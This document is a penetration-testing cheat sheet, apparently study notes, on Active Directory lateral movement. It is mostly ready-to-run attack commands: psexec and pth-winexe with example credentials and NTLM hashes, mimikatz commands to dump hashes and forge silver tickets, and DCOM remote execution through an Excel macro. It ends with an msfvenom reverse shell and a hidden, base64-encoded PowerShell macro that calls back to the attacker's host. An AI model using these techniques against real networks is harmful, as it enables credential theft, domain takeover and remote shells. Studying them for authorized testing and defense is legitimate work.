AD Lateral Movements

With creds

python /usr/share/doc/python3-impacket/examples/psexec.py svcorp.com/tris:ThisIsTheUsersPassword22@10.11.1.20

Pass the Hash

Auth with NTLM hash instead of a password. Works for NTLM only - e.g. when using IP instead of hostname within the AD.

The mechanism works as follows:

Attacker connects to the victim via SMB and performs the auth using the NTLM hash. A Windows service is started (e.g. cmd.exe or powershell) and is communicated with using Named Pipes via the Service Control Manager API. To make it work, SMB needs to be allowed on the Firewall (port 445) and Windows File and Print Sharing feature needs to be enabled.

Tools:

  • PsExec from Metasploit
  • Passing-the-hash toolkit (e.g. pth-winexe)
  • Impacket
# pth-winexe example
pth-winexe -U <username>%<blank_lm/blank_ntlm>:<hash> //<share/IP> <command>

# aad3b435b51404eeaad3b435b51404ee - blank LM
# 31d6cfe0d16ae931b73c59d7e0c089c0 - blank NTLM

# example:
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd

Overpass the Hash

This technique uses TGT which can be executed on the same machine where the ticket was generated.

First, you need to have access to a privileged account (local administrator). From there, you start cmd as an Administrator, launch mimikatz and dump the hashes:

sekurlsa::logonpasswords

Turning NTLM hash into a Kerberos ticket

# in the mimikatz

sekurlsa::pth /user:<username> /domain:<domain.com> /ntlm:<NTLM_hash> /run:<process>

# example:
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe

Generate TGT

# By authenticating to a DC, e.g.:

net use \\<dc> # e.g. \\dc01
klist # list tickets

Now we can reuse the ticket and log in to the DC with PsExec.exe:

.\PsExec.exe \\dc01 cmd.exe # this will log you in to the DC as the user for which the ticket was generated

Pass the Ticket

This technique uses TGS which may be exported and re-injected elsewhere.

Create the Silver Ticket

  1. Obtain SID
  2. Flush the existing tickets
  3. Genetate the silver ticket Obtain SID
whoami /user
# from the example output: S-1-5-21-1602875587-2787523311-2599479668-1103
# SID is: S-1-5-21-1602875587-2787523311-2599479668

Flush the existing tickets

# in mimikatz
kerberos::purge
kerberos::list

Generate the silver ticket

# in mimikatz
kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /target:<target_app> /service:<service> /rc:<password_hash> /ptt

# example:
kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP
/rc4:E2B475C11DA2A0748290D87AA966C327 /ptt

Distributed Component Object Model (DCOM)

General

Administrator rights are required to call DCOM Service Control Manager (which is like an API). Both Outlook and PowerPoit can be used for the lateral movement. TCP 135 (DCOM) and 445 (SMB) are required for this attach.

Create an instance of the object

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "<target_ip>"))

$com | Get-Member 
# look for Run method which allows us to execute VBA (e.g. the following entry: Run | Method | Variant Run... )
# and Workbooks object that lets us to open a Workbook (i.e. excel file; e.g. the following entry: Workbooks | Property | Workbooks Workbooks () {get} )

Create VBA Macro

Save it in the legacy .xls format.

Sub mymacro()
	Shell ("notepad.exe") # or another payload
End Sub

Transfer the file to the target machine

Since we must be local administrator to take advantage of DCOM, we should also have access to the remote filesystem via SMB, which we use to copy the file to the target:

$LocalPath = "<local_path>\myexcel.xls" # e.g. C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\<target_ip>\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)

Open the transferred file

$Path = "\\<target_ip>\c$\Windows\sysWOW64\config\systemprofile\Desktop" # this is required because application instantiated through DCOM are running from the SYSTEM account, which doesn't have a profile. So we create one.

$temp = [system.io.directory]::createDirectory($Path)

$Workbook = $com.Workbooks.Open("C:\myexcel.xls") # and now we can open the workbook

Run the macro

Now that we have opened the workbook, we can run our macro remotely:

$com.Run("mymacro")

Reverse Shell

Macro should contain the reverse shell, so we generate it and put it in the macro:

msfvenom -p windows/shell_reverse_tcp LHOST=<our_ip> LPORT=<our_port> -f
hta-psh -o evil.hta

Split the payload and add execution command:

str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....."
n = 50
for i in range(0, len(str), n):
	print "Str = Str + " + '"' + str[i:i+n] + '"'

And now put it in the macro:

Sub MyMacro()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
...
Str = Str + "EQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHM"
Str = Str + "AXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA="
Shell (Str)
End Sub